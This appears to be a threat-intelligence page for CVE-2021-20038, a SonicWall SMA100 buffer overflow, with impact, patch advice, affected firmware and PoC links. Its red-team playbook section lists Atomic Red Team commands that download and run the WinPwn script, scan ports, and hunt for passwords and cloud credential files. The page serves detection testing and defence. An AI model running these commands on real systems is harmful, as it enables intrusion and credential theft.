CVE-2021-20038
Overview
This vulnerability is a stack-based buffer overflow caused by improper handling of environment variables within the mod_cgi module of the Apache httpd server on SonicWall SMA100 appliances. The flaw arises from insufficient bounds checking when processing environment variable inputs, leading to memory corruption. The affected component is the mod_cgi module embedded in the SMA100 firmware versions up to 10.2.1.2-24sv across multiple SMA appliance models.
Vulnerability Description
A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code with 'nobody' user privileges on the affected appliance. This enables potential full compromise of the device, including unauthorized command execution and service disruption. No user interaction or valid credentials are required to trigger the exploit, increasing the attack surface and risk of widespread exploitation in network environments relying on vulnerable SMA appliances.
Solution
SonicWall has released firmware updates addressing this vulnerability in versions later than 10.2.1.2-24sv for SMA 200, 210, 400, 410, and 500v appliances. Administrators should apply the latest patches as detailed in SonicWall's official advisory (SNWLID-2021-0026) available at https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026. Following vendor guidance for updating firmware is critical to mitigate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A critical stack-based buffer overflow vulnerability exists within the mod_cgi module of the SMA100 Apache HTTP server, specifically affecting several firmware versions of SonicWall's SMA appliances. This vulnerability arises from improper handling of environment variables, which can lead to memory corruption. When an attacker sends specially crafted requests, they can exploit this flaw to overwrite the stack, potentially allowing arbitrary code execution. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a significant risk to systems utilizing the affected firmware versions.
The primary attack vector for this vulnerability is remote and unauthenticated, meaning that an attacker does not require any prior access to the system to exploit it. By sending maliciously crafted HTTP requests to the server, an attacker can manipulate the stack memory, leading to execution of arbitrary code with the privileges of the 'nobody' user. This level of access, while limited, can still be leveraged to escalate privileges or pivot to other systems within the network, posing a substantial threat to the integrity and confidentiality of the entire environment. Various exploitation scenarios could include deploying malware, exfiltrating sensitive data, or launching further attacks against internal resources.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on the affected SonicWall SMA appliances for secure remote access. Successful exploitation could lead to unauthorized access to corporate networks, data breaches, and significant operational disruptions. The potential for data loss or theft can result in financial repercussions, regulatory penalties, and damage to an organization's reputation. Additionally, the ease of exploitation increases the likelihood that threat actors will actively target vulnerable systems, making it imperative for organizations to address this risk promptly.
To mitigate the risks associated with this vulnerability, organizations should prioritize detection and remediation strategies. Regularly updating firmware to the latest versions is crucial, as vendors typically release patches to address known vulnerabilities. Implementing intrusion detection systems (IDS) can help identify and alert on suspicious activity indicative of exploitation attempts. Furthermore, organizations should conduct thorough security assessments and penetration testing to identify potential weaknesses within their infrastructure. Employing network segmentation can also limit the potential impact of an exploit, ensuring that even if an attacker gains access, their ability to move laterally within the network is restricted.
In conclusion, the stack-based buffer overflow vulnerability within the mod_cgi module of SonicWall's SMA appliances represents a significant threat to organizations utilizing affected firmware versions. The combination of remote exploitation capabilities and the potential for arbitrary code execution necessitates immediate attention from cybersecurity professionals. By adopting proactive detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, thereby enhancing their overall security posture.
CSURFACE threat intelligence has detected a marked escalation in activity exploiting CVE-2021-20038, with new telemetry indicating the vulnerability is being actively leveraged in the wild. This increase is underscored by a rise in the EPSS score, now approaching certainty of exploitation, reflecting a growing attacker focus on SonicWall SMA100 appliances running vulnerable firmware. Concurrently, new proof-of-concept exploits have emerged on public repositories, broadening the accessibility of attack tools and lowering the barrier for adversaries to weaponize this flaw. The association with ransomware groups such as Sinobi further elevates the threat, as these actors have demonstrated intent to incorporate this vulnerability into their campaigns. Collectively, these developments signify an elevated risk posture for organizations relying on affected SonicWall devices, necessitating heightened vigilance. The threat level has thus shifted from theoretical to actively exploited, emphasizing the criticality of detection and response capabilities tailored to this vulnerability.
Affected Products (15)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sonicwall | Sma 200 Firmware | 10.2.0.8-37sv |
cpe:2.3:o:sonicwall:sma_200_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 200 Firmware | 10.2.1.1-19sv |
cpe:2.3:o:sonicwall:sma_200_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 200 Firmware | 10.2.1.2-24sv |
cpe:2.3:o:sonicwall:sma_200_firmware:10.2.1.2-24sv:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 210 Firmware | 10.2.0.8-37sv |
cpe:2.3:o:sonicwall:sma_210_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 210 Firmware | 10.2.1.1-19sv |
cpe:2.3:o:sonicwall:sma_210_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 210 Firmware | 10.2.1.2-24sv |
cpe:2.3:o:sonicwall:sma_210_firmware:10.2.1.2-24sv:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 410 Firmware | 10.2.0.8-37sv |
cpe:2.3:o:sonicwall:sma_410_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 410 Firmware | 10.2.1.1-19sv |
cpe:2.3:o:sonicwall:sma_410_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 410 Firmware | 10.2.1.2-24sv |
cpe:2.3:o:sonicwall:sma_410_firmware:10.2.1.2-24sv:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 400 Firmware | 10.2.0.8-37sv |
cpe:2.3:o:sonicwall:sma_400_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 400 Firmware | 10.2.1.1-19sv |
cpe:2.3:o:sonicwall:sma_400_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 400 Firmware | 10.2.1.2-24sv |
cpe:2.3:o:sonicwall:sma_400_firmware:10.2.1.2-24sv:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 500v Firmware | 10.2.0.8-37sv |
cpe:2.3:o:sonicwall:sma_500v_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 500v Firmware | 10.2.1.1-19sv |
cpe:2.3:o:sonicwall:sma_500v_firmware:10.2.1.1-19sv:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 500v Firmware | 10.2.1.2-24sv |
cpe:2.3:o:sonicwall:sma_500v_firmware:10.2.1.2-24sv:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
SonicWall SMA 100 Series Authenticated Command Injection
exploits/linux/http/sonicwall_cve_2021_20039
|
jbaines-r7 | Unknown | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
vesperp/CVE-2021-20038-SonicWall-RCE
|
vesperp | 1 | 0 | 2022-08-08 | View |
|
anir0y/sonicwall-audit-toolkit
SonicWall security audit toolkit with vulnerable CTF lab (CVE-2021-20038, CVE-2024-53704)
|
anir0y | 0 | 0 | 2026-02-23 | View |
Threat Feed
7 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-20038 |
| psirt.global.sonicwall.com |
GitHub CVE
x_refsource_CONFIRM
|
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/jbaines-r7/badblood |
| rapid7.com |
GitHub CVE
x_refsource_MISC
|
https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-20038 |